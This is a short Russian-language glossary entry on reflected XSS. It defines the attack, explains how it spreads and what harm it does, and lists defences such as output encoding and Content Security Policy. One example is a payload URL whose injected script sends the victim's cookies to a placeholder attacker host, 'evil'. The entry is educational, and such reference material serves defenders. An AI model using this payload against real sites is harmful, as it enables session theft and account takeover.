Отражённый XSS
Что такое Отражённый XSS?
Отражённый XSSНепостоянный XSS, при котором подконтрольный атакующему ввод сразу отражается в ответе и исполняется в браузере жертвы.
Отражённый XSS (непостоянный, Type-1) возникает, когда веб-приложение принимает данные из HTTP-запроса — обычно из параметра URL или поля формы — и без должного кодирования вывода возвращает их в ответе. Атака требует, чтобы жертва перешла по подготовленной ссылке, поэтому распространяется через фишинг, вредоносную рекламу или мессенджеры. Успешная эксплуатация позволяет похитить сессионные cookie, совершить действия от имени пользователя или перерасти в полный захват учётной записи. Защита включает контекстно-зависимое HTML-кодирование, строгую Content Security Policy и фреймворки с автоматическим экранированием шаблонов.
● Примеры
- 01
https://example.com/search?q=<script>document.location='https://evil/?c='+document.cookie</script>
- 02
Страница ошибки, которая без санитизации вставляет параметр 'message' в DOM.
● Частые вопросы
Что такое Отражённый XSS?
Непостоянный XSS, при котором подконтрольный атакующему ввод сразу отражается в ответе и исполняется в браузере жертвы. Относится к категории Атаки и угрозы в кибербезопасности.
Что означает Отражённый XSS?
Непостоянный XSS, при котором подконтрольный атакующему ввод сразу отражается в ответе и исполняется в браузере жертвы.
Как защититься от Отражённый XSS?
Защита от Отражённый XSS обычно сочетает технические меры и операционные практики, как описано в определении выше.
Какие есть другие названия Отражённый XSS?
Распространённые альтернативные названия: Непостоянный XSS, XSS типа 1.